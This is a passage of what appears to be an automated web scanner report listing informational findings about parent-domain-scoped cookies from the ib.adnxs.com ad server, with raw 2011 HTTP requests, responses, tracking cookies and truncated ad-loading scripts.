acb120773=5_[r^208WMuF4Lw)IE.826L=t?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP_MUEDZxdL5eBWHfHSmrEELwO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEoAUBAgUCAAIAAAAAaCEU6wAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251888%29%3Buf%28%27r%27%2C+151403%2C+1296251888%29%3Bppv%2882%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2884%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2811%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2882%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2884%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2887%2C+%276827022114727400691%27%2C+1296251888%2C+1296338288%2C+2132%2C+24319%29%3Bppv%28619%2C+%276827022114727400691%27%2C+1296251888%2C+1296338288%2C+2132%2C+24319%29%3Bppv%28620%2C+%276827022114727400691%27%2C+1296251888%2C+1296338288%2C+2132%2C+24319%29%3Bppv%28621%2C+%276827022114727400691%27%2C+1296251888%2C+1296338288%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 22:02:19 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:02:19 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb402178=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb217792=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb120773=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 22:02:19 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb119885=5_[r^208WMrO@Pn)IE.80Xxlp?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP-hU1RiHaOEDBWHfHSmrEELrPENNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEBAkBAgUCAAIAAAAAeiENGgAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296252139%29%3Buf%28%27r%27%2C+151403%2C+1296252139%29%3Bppv%2882%2C+%27279619581320189160%27%2C+1296252139%2C+1306620139%2C+2132%2C+24319%29%3Bppv%2884%2C+%27279619581320189160%27%2C+1296252139%2C+1306620139%2C+2132%2C+24319%29%3Bppv%2811%2C+%27279619581320189160%27%2C+1296252139%2C+1306620139%2C+2132%2C+24319%29%3Bppv%2882%2C+%27279619581320189160%27%2C+1296252139%2C+1306620139%2C+2132%2C+24319%29%3Bppv%2884%2C+%27279619581320189160%27%2C+1296252139%2C+1306620139%2C+2132%2C+24319%29%3Bppv%2887%2C+%27279619581320189160%27%2C+1296252139%2C+1296338539%2C+2132%2C+24319%29%3Bppv%28619%2C+%27279619581320189160%27%2C+1296252139%2C+1296338539%2C+2132%2C+24319%29%3Bppv%28620%2C+%27279619581320189160%27%2C+1296252139%2C+1296338539%2C+2132%2C+24319%29%3Bppv%28621%2C+%27279619581320189160%27%2C+1296252139%2C+1296338539%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 22:02:19 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:02:19 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 22:02:19 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Fri, 28 Jan 2011 22:02:19 GMT
Content-Length: 743

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-15223392_1296252139,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.
...[SNIP]...

10.89. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.quadbostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.quadbostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-59440650_1296255616%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.weath_l-cm.ent_m-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D901204%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.ent_m%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D%5Btimestamp%5D%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v; sess=1; uuid2=4760492999213801733

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 30-Jan-2011 01:43:13 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:43:13 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:43:13 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb825542=5_[r^208WMM2x@N!@@-#r?TIj?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQlAPN9PjZduwj97FK5H4XrEP0905Saroqh9BWHfHSmrEEKxcENNAAAAANc8AwA3AQAAsQAAAAIAAAB4xgEAsl4AAAEAAABVU0QAVVNEACwB-gCqAQAAIAkBAgUCAAUAAAAAhyLogAAAAAA.&tt_code=cm.quadbostonherald&udj=uf%28%27a%27%2C+379%2C+1296265393%29%3Buf%28%27r%27%2C+116344%2C+1296265393%29%3B&cnd=!0RVLXwic0QEQ-IwHGAAgsr0BKAAxexSuR-F6xD9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABosQE.; path=/; expires=Sun, 30-Jan-2011 01:43:13 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:43:13 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v; path=/; expires=Fri, 29-Apr-2011 01:43:13 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 29 Jan 2011 01:43:13 GMT
Content-Length: 826

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.quadbostonherald/;net=cm;u=,cm-59440650_1296255616,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.
...[SNIP]...

10.90. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-15223392_1296252139%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D463717%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.47846851754002273%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: acb402178=5_[r^208WMuF4Lw)IE.8)Oje[?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPxfdyj3sNwc8BWHfHSmrEELYO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQE_AYBAgUCAAIAAAAAwCFK9AAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251864%29%3Buf%28%27r%27%2C+151403%2C+1296251864%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2811%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2887%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28619%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28620%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28621%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; 
acb217792=5_[r^208WMuF4Lw)IE.8._w.i?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP8xSvlfRzDIuBWHfHSmrEELlO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQElgQBAgUCAAIAAAAANCJDNAAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251877%29%3Buf%28%27r%27%2C+151403%2C+1296251877%29%3Bppv%2882%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2884%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2811%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2882%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2884%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2887%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28619%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28620%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28621%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; sess=1; icu=EAAYAA..; 
acb120773=5_[r^208WMuF4Lw)IE.826L=t?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP_MUEDZxdL5eBWHfHSmrEELwO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEoAUBAgUCAAIAAAAAaCEU6wAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251888%29%3Buf%28%27r%27%2C+151403%2C+1296251888%29%3Bppv%2882%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2884%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2811%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2882%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2884%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2887%2C+%276827022114727400691%27%2C+1296251888%2C+1296338288%2C+2132%2C+24319%29%3Bppv%28619%2C+%276827022114727400691%27%2C+1296251888%2C+1296338288%2C+2132%2C+24319%29%3Bppv%28620%2C+%276827022114727400691%27%2C+1296251888%2C+1296338288%2C+2132%2C+24319%29%3Bppv%28621%2C+%276827022114727400691%27%2C+1296251888%2C+1296338288%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 30-Jan-2011 01:42:23 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:23 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb402178=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb217792=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb120773=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:42:24 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb431330=5_[r^208WMM2x@N!@@-#bTu87?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQFAPN9PjZduwj97FK5H4XrEPz4kVcqezP9VBWHfHSmrEEJ_cENNAAAAACQ9AwA3AQAAsQAAAAIAAAB4xgEA_14AAAEAAABVU0QAVVNEACwB-gCqAdQExAUBAgUCAAIAAAAAXCPIbAAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+379%2C+1296265344%29%3Buf%28%27r%27%2C+116344%2C+1296265344%29%3B&cnd=!-xaQmAic0QEQ-IwHGAAg_70BKNQJMXsUrkfhesQ_QhMIABAAGAAgASj-__________8BSABQAFiqA2AAaLEB; path=/; expires=Sun, 30-Jan-2011 01:42:24 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:24 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Fri, 29-Apr-2011 01:42:24 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 29 Jan 2011 01:42:24 GMT
Content-Length: 742

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-15223392_1296252139,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.
...[SNIP]...

10.91. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Fnews%2Fregional%2Fview%2F20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist%2Fsrvc%3Dhome%26position%3D4&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D853654%3Bcontx%3Dpolit%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.5569272553548217%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=EAAYAA..; acb402178=5_[r^208WMuF4Lw)IE.8)Oje[?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPxfdyj3sNwc8BWHfHSmrEELYO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQE_AYBAgUCAAIAAAAAwCFK9AAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251864%29%3Buf%28%27r%27%2C+151403%2C+1296251864%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2811%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2887%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28619%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28620%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28621%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 21:57:57 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 21:57:57 GMT; domain=.adnxs.com; HttpOnly
